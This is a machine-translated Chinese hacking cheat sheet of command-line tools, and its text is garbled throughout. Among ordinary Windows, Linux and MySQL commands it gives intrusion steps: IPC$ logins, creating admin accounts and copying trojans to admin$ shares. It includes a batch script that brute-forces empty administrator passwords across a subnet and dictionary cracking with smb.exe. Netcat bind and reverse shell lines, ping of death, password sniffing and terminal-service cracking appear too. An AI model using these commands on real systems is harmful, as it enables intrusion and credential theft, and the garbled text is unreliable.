Net使用ipipc$ ""/user:" "建立ipc空鏈接。
Net使用ipipc$ "password" /user:"用戶名"建立ipc非空鏈接。
Net使用h: ipc$“密碼”/用戶:“用戶名”直接登錄,映射到對方。列車員:是h:
Net使用h: ipc$登錄C:後映射對方到本地,是H:
Net使用ipipc$ /del刪除ipc鏈接。
Net使用h: /del刪除對方到本地的映射,名稱為h:
Net用戶用戶名密碼/添加以創建用戶。
網絡用戶來賓/活動:是激活來賓用戶。
Net用戶來查看那裏有哪些用戶。
Net用戶帳戶名查看帳戶的屬性。
Net localgroup administrators用戶名/add將“用戶”添加到管理員,使其具有管理員權限。註意:在管理員後面加上復數s。
Net開始查看打開了哪些服務。
net start服務名啟動服務;(例如,網絡啟動遠程登錄、網絡啟動時間表)
網絡停止服務名稱停止服務。
凈時間目標ip檢查對方的時間
Net time target ip /set設置本地計算機與“目標ip”主機之間的時間同步,並添加參數/yes以取消確認信息。
查看本地局域網中啟用了哪些* * *特權。
Net查看ip,看對方局域網內開啟了哪些* * *權限。
網絡配置顯示系統網絡設置。
網絡下線斷開* * *享受
Net暫停服務名稱暫停服務。
Net send ip“短信”向對方發送消息。
網絡連接類型和信息用於網絡。
網分享查看當地* * *享受。
凈份額ipc$開放ipc$***享受。
凈份額ipc$ /del刪除ipc$***
凈份額c$ /del刪除c:* * * *享受。
Net用戶guest 12345登錄後,將密碼改為12345。
Net password密碼更改系統登錄密碼。
Netstat -a來查看哪些端口是打開的。經常使用netstat -an。
Netstat -n檢查端口的網絡連接,通常是netstat -an。
查看正在進行的工作
netstat -p協議名稱示例:netstat -p tcq/ip查看協議的用法(查看tcp/ip協議的用法)。
Netstat -s查看所有正在使用的協議的使用情況。
Nbtstat -A ip從136到139的其中壹個ip端口是開放的,可以查看對方最近登錄的用戶名(03之前的用戶名)-註意:參數-A要大寫。
tracert-參數ip(或計算機名)跟蹤路由(包),參數:“-w號”用於設置超時間隔。
Ping ip(或域名)向另壹臺主機發送默認大小為32字節的數據。參數是“-l[ space]數據包大小”;“-n次發送數據”;“-t”表示壹直ping。
Ping -t -l 65550 ip Ping of death(發送大於64K的文件並且壹直ping就變成了ping of death)。
Ipconfig (winipcfg)用於windows NT和XP(windows 95 98)查看本地ip地址,Ipconfig可以用參數“/all”顯示所有配置信息。
Tlist -t以樹行列表的方式顯示進程(它是系統的附加工具,默認情況下不安裝,位於安裝目錄的Support/tools文件夾下)。
在kill -F進程名中添加-F參數,強制結束壹個進程(它是系統的附加工具,默認不安裝,在安裝目錄的Support/tools文件夾下)。
添加-F參數後可以刪除Del -F文件名。/AR、/AH、/AS和/AA分別表示刪除只讀、隱藏、系統和存檔文件。/A-R、/A-H、/A-S和/A-A表示刪除除只讀、隱藏、系統和存檔文件以外的文件。例如,“DEL/AR *。* "表示刪除當前目錄下的所有只讀文件," DEL/A-S *。* "表示刪除當前目錄下除系統文件以外的所有文件。
二:
刪除/S /Q目錄或使用:rmdir /s /Q directory /S刪除該目錄及其下的所有子目錄和文件。同時使用參數/Q取消刪除操作,在系統確認後直接刪除。(兩個命令具有相同的效果)
移動驅動器路徑要移動的文件名存儲移動文件的路徑。移動文件名後,使用參數/y取消提示,確認移動目錄中存在相同文件,直接覆蓋。
fc one . txt two . txt & gt;3t.txt比較兩個文件,並將差異輸出到3t.txt文件。“>”和“> >這是壹個重定向命令
at id號打開註冊的計劃任務。
At /delete停止所有計劃任務,使用參數/yes,可以直接停止,無需確認。
在id號/刪除時停止已註冊的計劃任務。
查看所有計劃任務。
在ip時間程序名(或命令)/r在某個時間運行對方的程序並重新啟動計算機。
手指username @host查看最近有哪些用戶登錄過。
Telnet ip端口遠離登錄服務器,默認端口為23。
Open ip連接到IP(telnet登錄後的命令)
Telnet:在這臺機器上直接鍵入telnet將在這臺機器上輸入telnet。
復制路徑文件名1路徑文件名2 /y將文件1復制到指定目錄作為文件2,並使用參數/y取消確認,同時您要覆蓋現有的目錄文件。
復制c:srv.exe ipadmin$將本地的c:srv.exe復制到對方的admin。
cppy 1st.jpg/b+2st.txt/a 3st.jpg將2st . txt的內容隱藏到1st . jpg中,在3st.jpg生成壹個新文件。註意:2st.txt文件頭要空三行。參數:/b指二進制文件,/a指ASCLL文件。
復制ipadmin$svv.exe c:或:copyipadmin$*。*將其他admini$***享有的srv.exe文件(所有文件)復制到本地c:
Xcopy文件或目錄樹目標地址目錄名復制文件和目錄樹,並覆蓋相同的文件,而不使用參數/y進行提示。
Tftp -i自有IP(以肉機為跳板時使用肉機IP)獲取server.exe c:server . exe登錄後,將“IP”的server.exe下載到目標主機C:server。exe參數:-i表示以二進制模式傳輸,例如傳輸EXE文件時,或者如果沒有添加-i,則以ASCII模式(傳輸文本文件模式)傳輸。
tftp -i IP put c:server.exe登錄後,上傳本地c:server.exe到主機。
ftp ip端口用於向服務器上傳文件或執行文件操作。默認端口是21。Bin指二進制傳輸(可執行文件入口);默認情況下,它以ASCII格式傳輸(如果是文本文件)。
路由打印顯示IP路由,主要顯示網絡地址網絡地址、子網掩碼網絡掩碼、網關地址網關地址和接口地址接口。
Arp檢查並處理ARP緩存。ARP表示名稱解析,負責將IP地址解析為物理MAC地址。Arp -a將顯示所有信息。
啟動程序名或命令/max或/min打開壹個新窗口並最大化(最小化)運行壹個程序或命令。
用於檢查cpu使用情況的內存
Attrib文件名(目錄名)查看文件(目錄)的屬性。
Attrib文件名-A -R -S -H或+A +R +S +H刪除(添加)文件的存檔、只讀、系統和隱藏屬性;with+作為屬性添加。
查看文件的目錄。參數:/Q顯示文件和目錄屬於哪個用戶,/T:C顯示文件創建的時間,/T:A顯示上次訪問文件的時間,/T:W顯示上次修改文件的時間。
日期/t,時間/t使用該參數,即“日期/T”和“時間/T”,將只顯示當前日期和時間,而不輸入新的日期和時間。
Set指定環境變量名稱=要分配給變量的字符設置環境變量。
Set顯示所有當前環境變量。
Set p(或其他字符)顯示當前以字符p(或其他字符)開頭的所有環境變量。
暫停暫停批處理程序並顯示:請按任意鍵繼續。....
If在批處理程序中執行條件處理(有關更多詳細信息,請參見if命令和變量)
goto標記將cmd.exe指向批處理程序中的標記行(該標記必須是單獨的壹行,並以冒號開頭,例如“:start”標記)。
調用路徑批處理文件名從壹個批處理程序調用另壹個批處理程序(參見call/?)
For對壹組文件中的每個文件執行特定的命令(有關更多詳細信息,請參見for commands and variables)。
回聲打開或關閉打開或關閉回聲,顯示當前回聲設置,只有回聲,沒有參數。
回聲信息在屏幕上顯示信息。
回聲信息> & gtPass.txt將“信息”保存到pass.txt文件中。
Findstr "Hello" aa.txt在aa.txt文件中查找字符串Hello。
查找文件名查找文件
標題標題名稱更改CMD窗口的標題名稱。
color值設置cmd控制臺的前景色和背景色;0 =黑色,1 =藍色,2 =綠色,3 =淺綠色,4 =紅色,5 =紫色,6 =黃色,7=白色,8=灰色,9=淺藍色,a =淺綠色,B=淺綠色,C=淺紅色,D=淺紫色。
提示名稱改變顯示的cmd.exe命令提示(將C:和D:改為EntSky)。
三:
Ver在DOS窗口顯示版本信息。
Winver彈出窗口顯示版本信息(內存大小、系統版本、補丁版本、電腦名稱)。
Format letter /FS: type格式化磁盤,類型:FAT,FAT32,NTFS,例如:Format D: /FS:NTFS。
Md目錄名創建目錄
替換源文件被替換文件的目錄替換文件
任原文件名新文件名重命名文件名
Tree以樹形結構顯示目錄,第壹個文件夾中的文件名將使用參數-f列出。
類型文件名顯示文本文件的內容。
更多文件名逐屏顯示輸出文件。
Doskey命令鎖定=字符
Doskey command to unlock =為DOS提供的lock命令(編輯命令行,調用win2k命令,創建宏)。比如:lock dir命令:doskey dir=entsky (doskeydir = dir不能用);解鎖:doskey dir=
Taskmgr調用任務管理器
Chkdsk /F D:檢查磁盤D並顯示狀態報告;添加參數/f並修復磁盤上的錯誤。
Tlntadmn telnt service admn,鍵入Tlntadmn,選擇3,然後選擇8,將telnet服務的默認端口23更改為任何其他端口。
退出退出cmd.exe程序或目前使用參數/B退出當前批處理腳本而不是cmd.exe。
Path Path可執行文件的文件名設置可執行文件的路徑。
Cmd啟動win2K命令解釋窗口。參數:/eff,/en關閉和打開命令擴展。見cmd/?
regedit /s註冊表文件名被導入註冊表中;參數/S是指沒有任何提示的安靜模式導入;
Regedit /e註冊表文件名導出註冊表
Cacls文件名參數顯示或修改文件訪問控制列表(ACL)-對於NTFS格式。參數:/D用戶名:設置為拒絕用戶訪問;/P用戶名:perm替換指定用戶的訪問權限;/G用戶名:perm給指定的用戶訪問權限;Perm可以是:N無,R讀,W寫,C改(寫),F全控;示例:cacls D:est . txt/D pub set D:est . txt拒絕pub用戶的訪問。
Cacls文件名查看文件的訪問用戶權限列表。
REM文本內容向批處理文件添加註釋
查看或更改本地網絡配置
四:
IIS服務命令:
Iisreset /reboot重啟win2k電腦(但是有系統重啟的提示)。
Iisreset /start或stop啟動(停止)所有Internet服務。
Iisreset /restart停止並重新啟動所有Internet服務。
Iisreset /status顯示所有Internet服務的狀態。
Iisreset /enable或disable啟用(禁用)在本地系統上重新啟動Internet服務。
Iisreset /rebootonerror當啟動、停止或重新啟動Internet服務時,如果出現錯誤,它將重新啟動。
如果無法停止Internet服務,Iisreset /noforce將不會強制終止Internet服務。
當超時(秒)過期時,Iisreset /timeout Val沒有停止Internet服務。如果指定了/rebooterror參數,計算機將重新啟動。默認值為重啟20秒、停止60秒和重啟0秒。
FTP命令:(細節稍後給出)
ftp的命令行格式是:
FTP-V-D-I-N-G[主機名]-V顯示遠程服務器的所有響應信息。
-d使用調試模式。
-n限制ftp自動登錄,即不使用。netrc文件。
-g取消全局文件名。
幫助[命令]還是?[命令]查看命令描述
Bye或quit終止主機FTP進程並退出FTP管理模式。
Pwd列出了當前的遠程主機目錄。
上傳或發送本地文件名[上傳到主機的文件名]將本地文件發送到遠程主機。
Get或recv[遠程主機的文件名][下載到本地後的文件名]從遠程主機傳輸到本地主機。
Mget [remote-files]從遠程主機向本地主機接收壹批文件。
Mput local-files將壹批文件從本地主機傳輸到遠程主機。
Dir或ls[遠程目錄][本地文件]列出當前遠程主機目錄中的文件。如果有本地文件,則將結果寫入本地文件。
Ascii將文件設置為以ASCII格式發送(默認值)。
Bin或image設置文件以二進制模式發送。
每次完成文件傳輸時,Bell都會發出警報。
Cdup返回到上壹個目錄。
關閉中斷與遠程服務器的ftp會話(對應於打開)
Open host[port]建立指定ftp服務器的連接,並可以指定連接端口。
刪除從遠程主機刪除文件。
刪除壹批文件。
Mkdir directory-name在遠程主機上創建壹個目錄。
重命名[從][到]更改遠程主機中的文件名。
Rmdir directory-name刪除遠程主機中的目錄。
狀態顯示當前的FTP狀態。
系統顯示遠程主機系統類型。
用戶用戶名[密碼][帳戶]使用不同的用戶名再次登錄遠程主機。
Open host [port]重新建立新的連接。
提示交互提示模式
Macdef定義宏命令
lcd改變當前本地主機的工作目錄,如果默認,將轉到當前用戶的主目錄。
Chmod更改遠程主機的文件權限。
當大小寫打開時,由MGET命令復制的文件名被傳送到本地機器,並且所有文件被轉換成小寫字母。
Cd remote-dir進入遠程主機目錄。
Cdup進入遠程主機目錄的父目錄。
!在本地機器執行交互shell,exit返回ftp環境,比如!ls*。活力
#5五:
MYSQL命令:
Mysql -h主機地址-u用戶名-p密碼連接MySQL;如果剛剛安裝MYSQL,超級用戶root沒有密碼。
(例如:MySQL-h 110.10.10.110-urot-p 123456)
註意:u和root可以留空,其他也可以)
退出退出MYSQL
Mysqladmin -u username -p舊密碼新密碼更改密碼
授予對數據庫的select權限。*以用戶名@登錄由"密碼"標識的主機;添加新用戶。(註意:和上面不壹樣,下面都是MYSQL環境下的命令,所以後面用分號作為命令終止符。)
顯示數據庫;顯示數據庫列表。壹開始只有兩個數據庫:mysql和test。Mysql庫很重要。它包含MYSQL系統信息。我們在修改密碼和添加新用戶的時候,其實都是用這個庫來操作的。
使用mysql
顯示表格;顯示庫中的數據表
描述表名;顯示數據表的結構
創建數據庫庫名稱;建壹座圖書館
使用庫名;
創建表格表名(字段設置列表);制造壹只手表
刪除數據庫庫名稱;
刪除表表名;刪除數據庫和刪除表
從表名中刪除;清除表中的記錄
Select * from表名;在表格中顯示記錄
mysqldump-opt school & gt;School.bbb備份數據庫:(命令在DOS的目錄下mysql中執行);註意:將數據庫school備份到文件school.bbb,這是壹個具有任意文件名的文本文件。打開看看會不會有新發現。
win2003系統下的新命令(實用部分):
shut down/參數關閉或重新啟動本地或遠程主機。
參數描述:/S關閉主機,/R重新啟動主機,/T在0 ~ 180秒範圍內設置延遲時間,/A取消啟動,/m//IP指定的遠程主機。
示例:shutdown /r /t 0立即重新啟動本地主機(沒有延遲)
task ill/參數進程名稱或進程的pid終止壹個或多個任務和進程。
參數說明:/pid要終止壹個進程的pid,可以使用tasklist命令獲取每個進程的pid,/IM要終止的進程的進程名,/F強制終止進程,/T終止指定的進程及其啟動的子進程。
Tasklist顯示當前在本地和遠程主機上運行的進程、服務和服務進程的進程標識符(PID)。
參數說明:/M列出當前進程加載的dll文件,/SVC顯示每個進程對應的服務,如果沒有參數,則只列出當前進程。
六:
Linux系統下的基本命令:區分大小寫。
Uname顯示版本信息(與win2K的ver相同)
Dir顯示當前目錄文件,ls -al顯示隱藏文件(與win2K的dir相同)。
Pwd查詢當前目錄位置。
Cd cd..回到上壹個目錄,註意cd和之間有壹個空格...CD/返回到根目錄。
卡特彼勒文件名查看文件內容
cat & gtAbc.txt將內容寫入文件abc.txt
更多文件名逐頁顯示文本文件。
Cp復制文件
Mv移動文件
Rm文件名刪除文件,RM-目錄名刪除目錄和子目錄。
Mkdir目錄名創建目錄
Rmdir刪除子目錄,目錄中沒有文檔。
Chmod設置文件或目錄的訪問權限。
Grep在文件中查找字符串。
差異文件比較
查找文件搜索
日期當前日期和時間。
誰在查詢目前和妳用同壹臺機器的人以及登錄的時間和地點。
w查詢當前計算機用戶的詳細信息。
Whoami檢查您的帳戶名稱。
群組查看某人的群組。
Passwd更改密碼
歷史,檢查妳自己的命令。
Ps顯示進程狀態。
Kill停止壹個進程。
Gcc黑客通常用它來編譯C語言編寫的文件。
Su權限被轉換為指定的用戶。
Telnet IP telnet連接到另壹臺主機(同win2K),當bash$出現時,連接成功。
Ftp ftp連接到服務器(與win2K相同)。
附件:批處理命令和變量
1:for命令和變量的基本格式:
FOR/parameter % variable in(set)docommand[command _ parameters]% variable:指定單字母可替換參數,如:%i,用:%%i指定變量,用:%i%調用變量,變量區分大小寫(%i不等於%i)。
批處理可在%0-%9 * * * 10的時間範圍內處理的變量,其中%0默認用於批處理文件名,而%1是使用此批處理時輸入的第壹個值。類似地,% 2-%9是指輸入的第二個到第九個值;示例:net use ipipc $ pass/user:用戶中的ip是%1,pass是% 2,用戶是%3。
(set):指定壹個文件或壹組文件,使用通配符,如(D:user.txt)和(1 1 254)(1-1 254),{"(1 1 254)。"(1 -1 254)"描述:從254到1}
Command:指定要在第壹個文件上執行的命令,如:net use command如果要執行多個命令,命令這個房間添加:&;分開
Command_parameters:為特定命令指定參數或命令行開關。
IN (set):指(set)中的值;DO命令:指執行命令。
參數:/L是指增量形式{(set)是增量形式};/F是指從文件中連續取值,直到取完為止{(set)是文件,比如(d:pass.txt)}。
用法示例:
@關閉回聲
Echo使用格式:test.bat *。*.* >測試. txt
for/L % % G in(1 1 254)do echo % 1。% % G & gt& gttest.txt & amp凈使用\% 1。%% g/user: administrator | find "命令成功完成" > & gt測試. txt
另存為test.bat描述:依次嘗試為指定C類網段的254個IP建立管理員密碼為空的IPC$連接。如果成功,將IP保存在test.txt中。
/L是指增量形式(即從1-254或254-1);輸入IP的前三位數字:*。*.*是批處理的默認% 1;%%G是變量(ip的最後壹位);& amp用於分隔echo和net use命令;|指建立ipc$,在結果中用find查看是否有"命令成功完成"的信息;%1.%%G是壹個完整的IP地址;(1 1 254)是指起始值、增長額和終止值。
@關閉回聲
Echo使用格式:ok.bat ip
對於/F % % I IN(D:user . DIC)DO smb.exe % 1% % I D:pass . DIC 200
另存為:ok.exe描述:輸入壹個IP後,使用字典文件d:pass.dic解密d:user.dic中的用戶密碼,直到取完文件中的所有值。%%i是用戶名;%1是輸入的IP地址(默認)。
七:
2.2:if命令和變量的基本格式:
IF [not] errorlevel數字命令語句如果程序最終返回壹個等於或大於指定數字的退出代碼,則指定條件為“真”。
示例:IF errorlevel 0命令是指返回值為0時程序執行後的命令;IF not errorlevel 1命令意味著如果程序執行返回的最後壹個值不等於1,將執行下面的命令。
0表示找到並成功執行(真);1表示未找到或未執行(假)。
IF [not] string 1== string 2命令語句如果指定的文本字符串匹配(即string 1等於string 2),將執行下面的命令。
示例:“if"% 2% "=" 4 "goto start "的意思是:如果輸入的第二個變量是4,將執行以下命令(註意:調用變量時,% variable name%會加上" ")。
IF [not] exist文件名命令語句如果指定的文件名存在,下面的命令將被執行。
例如:“如果不是nc.exe·格托恩德”的意思是:如果妳沒有找到nc.exe的文件,跳到“:結束”標簽。
IF [not] errorlevel數字命令語句else命令語句或if [not] string 1== string 2命令語句else命令語句或IF [not] exist文件名命令語句else命令語句plus:在else命令語句後,是指前壹個條件不為真時else行後的命令。註意:else必須在同壹行上才有效。當有del命令時,應該使用del命令的全部內容
(2)系統外部命令(需要下載相關工具):
1,瑞士軍刀:nc.exe
參數描述:
-h查看幫助信息
-三維背景模式
-e prog程序重定向,壹旦連接,執行[危險]
isecs延遲間隔
-l監聽模式,用於入站連接
-L監控模式,連接關閉後繼續監控,直到CTR+C。
-n IP地址,不是域名。
-o片記錄16的傳輸。
-p[ space] port本地端口號
-r隨機本地和遠程端口
-t使用Telnet交互模式。
-u UDP模式
-v詳細輸出,用-vv會更詳細。
-w數字超時延遲間隔
-z關閉輸入和輸出(當用於掃錨時)
基本用法:
NC-NVV 192.168.0.180連接到192.168.0 . 1主機的80端口。
Nc -l -p 80打開本機的TCP 80端口監聽。
NC-NVV-W2-z 192.168.0 . 180-1024 80-192.168.0 . 1用於掃錨。
NC-l-p 5354-t-e c:winntsystem32cmd.exe將遠程主機的cmdshell綁定到遠程主機的TCP 5354端口。
NC-t-e c:winntsystem32cmd.exe 192.168.0 . 2 5354設置遠程主機的cmdshell,反向連接192.438+068.0.2的端口5354。
高級用法:
Nc -L -p 80作為蜜罐用1:打開並不斷監聽80口,直到CTR+C。
NC-L-p 80 & gt;C:log.txt作為蜜罐,用2:開啟,不斷監聽80口,直到CTR+C,輸出結果到c: log.txt。
NC-L-p 80 & lt;C:honeyport.txt作為蜜罐用3-1:打開並不斷監聽80端口直到CTR+C,將c:honeyport.txt中的內容發送到管道中,也可以起到傳輸文件的作用。
Type.exe C:honey port | NC-L-P 80作為蜜罐3-2:打開並不斷監聽端口80,直到CTR+C,將c:honeyport.txt中的內容發送到管道中也可以起到傳輸文件的作用。
對於本機器:nc -l -p本地端口。
在另壹臺主機上:NC-e cmd.exe本地IP -p本地端口*win2K。
Nc -e /bin/sh本地IP -p本地端口*linux,unix反向連接突破對方主機的防火墻。
本機使用:nc -d -l -p本地端口
在對方主機上:NC-vv local IP local port >;存儲文件的路徑和名稱。將文件發送到另壹臺主機。
註意:
管道命令
& lt或>重定向命令。" & lt",例如:tlntadmn < Test.txt是指將Test.txt的內容賦給tlntadmn命令。
@表示執行@後面的命令,但不會顯示(後臺執行);示例:@ @ dir c:win nt > & gt;D:log.txt的意思是:dir在後臺執行,結果存儲在D: log.txt中。
& gtWith > & gt“>”的區別是指:覆蓋;" & gt>指保存到(添加到)。
如:@ dir c:win nt > & gt;D:log.txt和@dir c:winnt >兩個命令d:log.txt比較兩次:use >;& gt目的是保存所有的次要結果,使用: >只有壹個結果,因為第二個結果覆蓋了第壹個結果。
八:
2.掃錨工具:xscan.exe。
基本格式
xscan-host & lt;開始IP & gt[-& lt;終止IP & gt]& lt;測試項目>【其他選項】掃描主播“起始IP到結束IP”段的所有主機信息。
xscan-file & lt;主機列表文件名> & lt測試項目>[其他選項]掃描錨中的所有主機信息"主機IP列表文件名"
試驗項目
-active檢測主機是否處於活動狀態。
-操作系統檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port檢測常用服務的端口狀態。
-ftp檢測ftp弱密碼
-pub檢測FTP服務的匿名用戶的寫權限。
-pop3檢測pop 3-服務器弱密碼
-smtp檢測smtp服務器漏洞
-sql檢測SQL-Server弱密碼
-smb檢測到NT-Server弱密碼。
-iis檢測到iis編碼/解碼漏洞。
-cgi檢測cgi漏洞
-nasl加載Nessus攻擊腳本
-all檢測上述所有項目。
其他選項
-i適配器號設置網絡適配器,可以通過"-l "參數獲得。
-l顯示所有網絡適配器。
-v顯示詳細的掃描進度。
-p跳過沒有響應的主機。
-o跳過未檢測到開放端口的主機。
-t並發線程數,並發主機數指定最大並發線程數和並發主機數,默認為100和10。
-log file name指定掃描報告的文件名(後綴為:TXT或HTML格式的文件)。
用法示例
xscan-主機192.168.1-192.654438+068.255 . 255-全主動式害蟲檢測+092 . 54656656
xscan-host 192.168.1-192.168.255 . 255-Port-sm B- t 150-O檢測192。168.255.255網段內主機的標準端口狀態,nt弱密碼用戶,最大並發線程數為150,跳過無開放端口的主機。
xscan-file hostlist.txt-port-CGI-t200,5-v-o檢測“host list . txt”文件中列出的所有主機的標準端口狀態,以及CGI漏洞。最大並發線程數為200,最多同時檢測5臺主機,顯示詳細的檢測進度,跳過未檢測到開放端口的主機。
九:
3.命令行嗅探:xsniff.exe。
可以捕獲局域網中FTP/SMTP/POP3/HTTP協議的密碼。
參數描述
-tcp輸出tcp數據報
-udp輸出udp數據報
-ICMP輸出ICMP數據報
-傳遞過濾器密碼信息。
-隱藏後臺運行
-host解析主機名。
-addr IP地址過濾器IP地址
-端口端口過濾器端口
-log filename將輸出保存到文件中。
ascII格式的ASC輸出。
-十六進制輸出為16的十六進制形式。
用法示例
xsniff . exe-pass-hide-log pass.log在後臺運行嗅探密碼,並將密碼信息保存在pass . log文件中。
xsniff . exe-tcp-udp-ASC-ADR 192.168.1嗅探192.168.1過濾TCP和UDP信息並以ASCII格式輸出。
4.終端服務密碼破解:tscrack.exe。
參數描述
-h顯示幫助。
-v顯示版本信息。
-s在屏幕上播放解密的能力
-b密碼錯誤時的聲音。
-t both發送多個連接(多線程)
-N阻止目標服務器上的系統日誌條目
-U卸載刪除tscrack組件。
-f大使